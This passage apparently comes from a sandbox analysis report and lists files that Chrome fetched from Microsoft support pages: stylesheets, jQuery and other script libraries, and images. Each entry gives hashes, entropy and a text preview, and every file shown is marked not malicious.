                                                                                                                      Preview:.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful{height:auto;display:flex;justify-content:center;align-items:center;gap:32px}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful #beginFeedbackHeader{padding:0;margin:0}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful .extendedFeedbackHeader{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:16px;font-weight:600;line-height:20px;color:#333}.smbArticleFluent #extendedFeedbackForm .feedbackButtons{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:14px;font-weight:600;line-height:20px;display:flex;align-items:flex-start;gap:16px}.smbArticleFluent #extendedFeedbackForm .feedbackButtonBlue{min-width:auto;display:flex;padding:3px 40px;justify-content:center;align-items:center;border-radius:4px}.smbArticleFluent #exte
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):318713
                                                                                                                      Entropy (8bit):4.9382988876470755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:owtki9QkGoO4QPwGY5DPMwqGsbkyvLUi4beyAX/bSe2yUXaemHqOOkwsik7oZtIm:Fj9p
                                                                                                                      MD5:F747282A2831677A6CB1C9CA4FE2B8FE
                                                                                                                      SHA1:5B58775E73BD52981112378D9CE936305FE95832
                                                                                                                      SHA-256:A5B1011E796F97DE920414F0C9A0D54291A16DB3325D2541A003A93D025492F2
                                                                                                                      SHA-512:AF25D86E3301E93136F399CACC31E3B037EA4FCF81B95FDA587F38D3D0CAA9286CC5C1C870C184FFE4DF6D773826535266F41D06EB7071357DB60B3970C92BC3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-base.min.ACSHASHf747282a2831677a6cb1c9ca4fe2b8fe.css
                                                                                                                      Preview:.cmp-image__image{width:100%}..aem-Grid{display:block;width:100%}..aem-Grid::before,.aem-Grid::after{display:table;content:" "}..aem-Grid::after{clear:both}..aem-Grid-newComponent{clear:both;margin:0}..aem-GridColumn{box-sizing:border-box;clear:both}..aem-GridShowHidden>.aem-Grid>.aem-GridColumn{display:block !important}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:100%}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--offset--default--0{margin-left:0}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--offset--default--1{margin-left:100%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:50%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--default--2{float:left;clear:none;width:100%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--offset--default--0{margin-left:0}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--offset--default--1{margin-left:50%}..aem-Grid.aem-Grid--2>.a
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (505)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1418
                                                                                                                      Entropy (8bit):5.418786110345074
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                      MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                      SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                      SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                      SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18254
                                                                                                                      Entropy (8bit):7.950218967534029
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4ZgtqkzeTs36Io/E0ZadkL8eExKAF+2/IEBTbztwaLAWoAGuJ:4aBzwWunZayL8eExKAFtQOTbzCak92
                                                                                                                      MD5:334DB99BB88BA472A3116C0B3A7449DE
                                                                                                                      SHA1:12B43CCBAA0A58336319B7AD981F8EECE202228F
                                                                                                                      SHA-256:2853C551260E74FD1BADFBBCBA7ADC12539FC2BBC6124516D3AE4F3BDD76A2CA
                                                                                                                      SHA-512:8AB869E0D4201A8F1BF2FDAE69524E481E80502D0881837D57B7ECF91075E0BE3A0DDFCD4E045B0CD5FEEFB405067A0EE76B1CFEA902C43D546AE9AF9F0DB469
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...F.IDATx..y.&Uu....P. .&"...........`...".!e$.e..M.Q..T.d...18....HJ+j.@R.E+&e"..,%K.B.f.?.Y..4.g..v....ow.>U]........o.s.;........a...\.-[....cIN3.......Pr<._.r.{B............[.).5k*..{..G.).n.........V....]n.{...5.....L..P+..%7.mW&,R..=..\...pu.T.s.J...._.....2........xW..s$TL.eCIu.9. $.INm..m.]{c_l*....~..q..x...G.........=..r.`Z.X.b.)PO-.Dg...Iu..v.R....F. .-....E.Hix......*57B.5.!.....".029...@O...}.r"..S.....a_..#....qhO..<..s.C..7.~.E..... .....}........,../2X...`...L..pZ.}...k...e..aM.u........k.^U~..z.@.f..2.:.......!*m.v.0........3D...}.&.$..@ZB-T.J.=.. .].+..>.....!..0SR7R.3.3m..)...0.....y..PFm...{<S....s.'...`!....z..O..y.u....@Zrp..b.c...=........:..:F.'+BJ..'.@..v.K.=..b.PU.h}.*.H...... .,R.R[..g.$....:........".\s{.8.Kh..F.hz..R.....&..'...%..)..S..m.......s.k.. cb..,....p.H.U.....")..t..)...Z...i.W..\.`!...S..C.5.Z..........$.j..b....l*em.t^..K...hr
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (780), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):780
                                                                                                                      Entropy (8bit):4.992440844788031
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:a4+A24uJEVdLV+awt+a9QdKCHXgc+a9aaXgc+a2XgcS:a4+xJEV9Vbwtb9QT1b9ac1bw1S
                                                                                                                      MD5:CB3531F56366637C3E928C625264646D
                                                                                                                      SHA1:3F6B2AC9B3A9C76EF8410FCA587105F1D95238A5
                                                                                                                      SHA-256:47F3F44C9BC3F47A111D004476F051D5684D9FB7526EF3985A6540F6D6B16E93
                                                                                                                      SHA-512:5E99E7DCADC11B1BD462D4CE8C1BF4334857E830EAFD4AECBD689F9C3869689D25A568C8B91ACEC69E7A6B1E2FD033DB47D7F84DC260F92BE3823203FCDB8D1A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/ArticleSupportBridge/article-support-bridge.css?v=R_P0TJvD9HoRHQBEdvBR1WhNn7dSbvOYWmVA9taxbpM
                                                                                                                      Preview:.articleSupportBridge{margin-bottom:-40px}.articleSupportBridge .bridgeHeading{margin-top:40px;font-family:"Segoe UI Light","wf_segoe-ui_light",Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif;font-size:2.4em;font-weight:bold;line-height:1.333;margin-bottom:15px}.articleSupportBridge .bridgeToken{margin-top:-30px}.articleSupportBridge .supportBridgeCTA{text-align:left;margin-top:-10px}.articleSupportBridge .supportBridgeText{text-align:left}.articleSupportBridge .phaseOneCTA{text-transform:uppercase;letter-spacing:.975px;text-decoration-style:solid;font-size:13px;text-align:left;font-weight:600}html[dir=rtl] .articleSupportBridge .supportBridgeText,html[dir=rtl] .articleSupportBridge .supportBridgeCTA,html[dir=rtl] .articleSupportBridge .phaseOneCTA{text-align:right}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20879
                                                                                                                      Entropy (8bit):7.950262750419023
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:46Xz3aJorn/4FQhJt9fr1Ql3LyjJELj+Se9ouEkcQb0We77nGwIZOYjHmvGSZpV:4CaurgGn9fr1Q1GGLjVmsCa77GwIZfjM
                                                                                                                      MD5:133A012311EC0C7DC8900D41BFFE18E2
                                                                                                                      SHA1:A8344E3CB54AC529652411C13DE0FC9F18C72418
                                                                                                                      SHA-256:BC07BB9CDAECB6BB882CCD19058DD50E6376C9D0D4DAEB5576949CF80C1E5DF0
                                                                                                                      SHA-512:84AAE06C3C881FB388A4EB69478C3A15CCA7DDBC018C3D8942B772F9D30790322AC4398EF7C9F147BE3FFF14F63F184F3AD4BBB6666785704DB47DA43F1DC175
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...Q$IDATx.....Q.s..x...................1`G..2^y..<...p.k..M..:.'OJ.L.nU._DGw..[U...2S....o~....W..i...5c...,...x5v...5..Yu...u{.j..[K...J.G\...M.=I.e....5......!........oms.|r....Hd..e.(.,7...Qc.z.>|e.t.E...s..V.rJ.C.......AEI...Q.S.1..y..N.}R=.s.j.Z. .^..R.. ....T.....QV..H.gT.....N.4.<...H.&^V-...+..FHar...3.*Wt.F....h.....}.fY....R.K..~,.N.U.TN.,..*}n.W\.."..8....eE.(o...|.........cm.FDi..].9N.p.>j..%.fY7F...........p..q.......z..k...#..g.l.D..xi.;...&.....P.k....9=&.F~.._...."...V7.L...:.....Q..NX.j\Q...1KZA%....6P.VG......e<m.B.m..H!5r....Bg.h...f.';...y=...X.:B8i.R..Kz.U.t.&.ZB...(aZ....".!..F.T`w..&.Y.s.......|..6ZDi.D..D...RI..:wd+./G:&......Z.Z.m.).....5@..N.......X[no...*.5..k3.Q1Q..5!.\.&p..^.1MR|.M..d.r.....s..WJ...=s0.N....`.......V.S,Z5....#*..T4...B....n.DF.NZ...d....&..Mk..........N....D[..yJ.I:NE..*.j..M..T.2-iZ.E..$.F.V.;......R..X.'g..v+k.....C.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):138067
                                                                                                                      Entropy (8bit):5.225028044529473
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7nKRZMK/xw/:1f4Hu1I+kw/
                                                                                                                      MD5:B9C3E4320DB870036919F1EE117BDA6E
                                                                                                                      SHA1:29B5A9066B5B1F1FE5AFE7EE986E80A49E86606A
                                                                                                                      SHA-256:A1FE019388875B696EDB373B51A51C0A8E3BAD52CD489617D042C0722BDB1E48
                                                                                                                      SHA-512:A878B55E8C65D880CDF14850BAEE1F82254C797C3284485498368F9128E42DCA46F54D9D92750EEEB547C42CAB9A9823AA9AFAB7D881090EBBFA1135CDD410B6
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/uhf/dist/uhfbundle.js?v=of4Bk4iHW2lu2zc7UaUcCo47rVLNSJYX0ELAcivbHkg
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4565
                                                                                                                      Entropy (8bit):7.879534543139402
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                      MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                      SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                      SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                      SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                      Malicious:false
                                                                                                                      URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                      Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):308
                                                                                                                      Entropy (8bit):7.1080290655651375
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:ck5Z+lUPuq5yIRVnVhRp6sAm5nnWpQLJffvsFvboYe/zfpKU:cxlUPukyIHn7X64nDLJ5Ye/zhKU
                                                                                                                      MD5:6B7A4ADE4D99086DA8E64F1E23F2F579
                                                                                                                      SHA1:4CF069F3C32BD6FE5CCCFB7ABDDF42D36DDCD547
                                                                                                                      SHA-256:1F98B878DA957BA2B2C06415F405EA23832CDF5A4DADD9C76648BF72F37822FB
                                                                                                                      SHA-512:90ED525AFEC742BD3F08D3BB8FEE45A93284C12E1B097F23BBA9C11E1AB388B261FA4515B25578B91A80AB0061B42916DA260F3F1F55356C24BF28972FD935AF
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF,...WEBPVP8 ........* . .>Q..D#......8....N.q...x.(...yd.....w,...S\....~..e...^......h.=...]....\|....Qt.K.X...z...|~.....&....9.M...........;.gX...+.c=s}..~..\..G'. .$..D_....Z....<..S...TW..+....!S.i........~>&b............*.:"......wN.L..z9y"3:..A......k...P....2?>k0..'.P..O.e....P.b2...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):308
                                                                                                                      Entropy (8bit):7.1080290655651375
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:ck5Z+lUPuq5yIRVnVhRp6sAm5nnWpQLJffvsFvboYe/zfpKU:cxlUPukyIHn7X64nDLJ5Ye/zhKU
                                                                                                                      MD5:6B7A4ADE4D99086DA8E64F1E23F2F579
                                                                                                                      SHA1:4CF069F3C32BD6FE5CCCFB7ABDDF42D36DDCD547
                                                                                                                      SHA-256:1F98B878DA957BA2B2C06415F405EA23832CDF5A4DADD9C76648BF72F37822FB
                                                                                                                      SHA-512:90ED525AFEC742BD3F08D3BB8FEE45A93284C12E1B097F23BBA9C11E1AB388B261FA4515B25578B91A80AB0061B42916DA260F3F1F55356C24BF28972FD935AF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/facebook?scl=1
                                                                                                                      Preview:RIFF,...WEBPVP8 ........* . .>Q..D#......8....N.q...x.(...yd.....w,...S\....~..e...^......h.=...]....\|....Qt.K.X...z...|~.....&....9.M...........;.gX...+.c=s}..~..\..G'. .$..D_....Z....<..S...TW..+....!S.i........~>&b............*.:"......wN.L..z9y"3:..A......k...P....2?>k0..'.P..O.e....P.b2...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):25084
                                                                                                                      Entropy (8bit):7.954629745011792
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:z4b+mWMn+0y7Pg/1ZG7QBkT1ptdZXWVTTaGOKPKb3BZE3SDL0Fkx1qEPNugrtRPI:E+5Mn34PglkT9XICcPKb3Bh0e5tQT
                                                                                                                      MD5:9AA997545CAD62F24960E39B773AE81C
                                                                                                                      SHA1:3EBF01E3B3630F127309F816F13FF86B94798E07
                                                                                                                      SHA-256:BC5E9528086858FD7BFF758A1B0AE0D559A9930E279ECDF4955572B6AD1E53EA
                                                                                                                      SHA-512:4B2572DEA6B5C777AF39359095D97EB8078B3B252D4A70191837BF5C641B860CD4AF56719B3D96E45CBEBB13465625FD5DD6E66BC03F009487FEBEAF5D9F7169
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/fbf6e41b-ddbe-43db-a616-7a8e48d43d18.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...a.IDATx..y..Eu...u}.@1.....D...IX..0,A..Fc.`.,.D..H .eUX.....E..X.H...1q......(....*l...r.!.....rz.....yf......9.{6z.......h....__......r.S.C..F...T.o...<.9.M..$].6.:...9..vSrN.B.2.Ug....x..rU6i>zY..C.lK.._.v.H.......9.S..U.]T.v..Y8..LJ...tl.C....m(...&.(QpAP.x\".._.G..$.L..)T[.."j$...}...@>z.n-..X.U..45&.S*.....N.m\...m"I"...\.q.|M.6#.............Q....."*...e..m.6..f.....Sj...cK+DH...+]..".......i..Q.......xS.24@....C".$b*.]'Y...<J.$.jY7J........i..0..1..........y./)Db.@_@.m.X|..u..f..w..C@.\{.mc..u&....5k..`.j.ZO7.L...7.....R..zxp...B...Y..*..&!#..v...m[.\|!}....B%-..K!U..cjj..Z...^...(.J....LHYK.'.@r.....*d[..Q>..[VJ..b...H5H-....h.9..K.;.1..#.)fy.........r..B.X.L.)..PV$=..:.6!.B..Z.|...).....%@..IK.G....'ci....(.-.......R.....5W..]..4.......2[..m...9..g...w.....p.4t..... ..(.je...r..R....{E.y.Xhr..U.>.H....5}.,Q.4S.$..I...R..` ....=R.#.-Y.}l......U.W...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (352), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):352
                                                                                                                      Entropy (8bit):5.097997927435311
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q37FejK1hPCuLNKKCdTtyg4LKLnawvStEYl4BXWe/8hdsGg9ZPYgyg4L/:c7Mj+h6uh30tyg4LKGsSEvophufdYgyf
                                                                                                                      MD5:46469E1FACB74FFD90D181244E48558C
                                                                                                                      SHA1:74003A1FCBF4178C5F6F275D68468B2B765AFBE0
                                                                                                                      SHA-256:F83D4C9FC55AB64D61D29878A7B7722D331E1FD476429736FE8AFE156D44F970
                                                                                                                      SHA-512:8A21A9A850EE9CAF39CEFE2BD492A1721C2A69EA85BE476982BE0E24FFC6B6DB135EDAB5302A75FAAF2C55DDC0ABB21FAA34EC38230F19C10A7A70574D6871C3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/tablecomponent/v1/tablecomponent/clientlibs/site.min.ACSHASH46469e1facb74ffd90d181244e48558c.js
                                                                                                                      Preview:'use strict';$(function(){$(".table-container table th,td").html(function(a,b){return b.replace(/&nbsp;/g," ")})});function addFootnotesTableComponentV1(){document.querySelectorAll(".table sup").forEach(a=>{0==a.children.length&&a.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})}addFootnotesTableComponentV1();
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):159
                                                                                                                      Entropy (8bit):4.661188988961239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                      MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                      SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                      SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                      SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (889)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):92962
                                                                                                                      Entropy (8bit):5.482012211093105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                      MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                      SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                      SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                      SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):17028
                                                                                                                      Entropy (8bit):7.926562320564401
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:7wixC+iG9rj5+kgbLPcAmxOkpJIhI9CvaMo05vCf9MRRLMk5K/jk:sifiG2tvXmxHbIhlo05KlGRaY
                                                                                                                      MD5:DDCB4FCA39CCADCDF6C1FE2E1F717867
                                                                                                                      SHA1:88238D53920F32AF37A802A5E6BFEEC3B1E6F75D
                                                                                                                      SHA-256:097DF2DFA3781F1AEDB631C968D04D8152D7C7FA8E92BC91E233B3000E2F34BB
                                                                                                                      SHA-512:316574E565EF67B97E13D0BF01CF4AFA8E0E9CF0748768CE4AE6BBB81352685A6E027EADBC083D2B632C412C950E65963E6EA98FE4CE7692C0AE0B6D956D3D37
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...B.IDATx..Y.mWU.W.7.A.e.Z..H.R.F.......$!....iH..4...T@..{i.A.....M..... .XP6eaB..R% ...Bs.o.0N..w...Zkvk..j.>g.}.^...c.1O...?..K.I'..J..<.c..fX!..N.m5...!.O-.=....p/....B.m_..o..........7.{..............]..~...C.....J..g..*bI.C.....@&.7.}...u.RYs.J_.P_..j.....J...%..}.{..)}o,....|...2iil+1.n:.W.b.I@. ......q/........},...K.....b.35f.....@t.C.H..f.....X8...qXA5W\m*G..78..E.Wjm..j.C.E.....L.!e...}..... .FKi......!........t.;.s:8.P....9...H@....I! ...lp....`...".#.... .d"......=eN.nNcMUu......=.l......a.@...KY...^.....D..........=..<%&..}...P.HK.CE...0...R1..r..#h.5...)....z.B.....7.DH....KE...ha)....Z.=........)b*ZH.X.._...)........HK.a.Pn.X1Eh.....o.B......k...2....`..v.O.=...]..Y.!..:R.:......G*@jg.q.[b.....)].O.....jm...q.c..*...=B...|.........%....x.Bc..[.....r.....4......R.}......R...6.I..W..!...8K...:..U.. .3ZH...t.e..f\.(...y>k+.AH"..K.GjI!....J.}...HK..&..%.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4565
                                                                                                                      Entropy (8bit):7.879534543139402
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                      MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                      SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                      SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                      SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
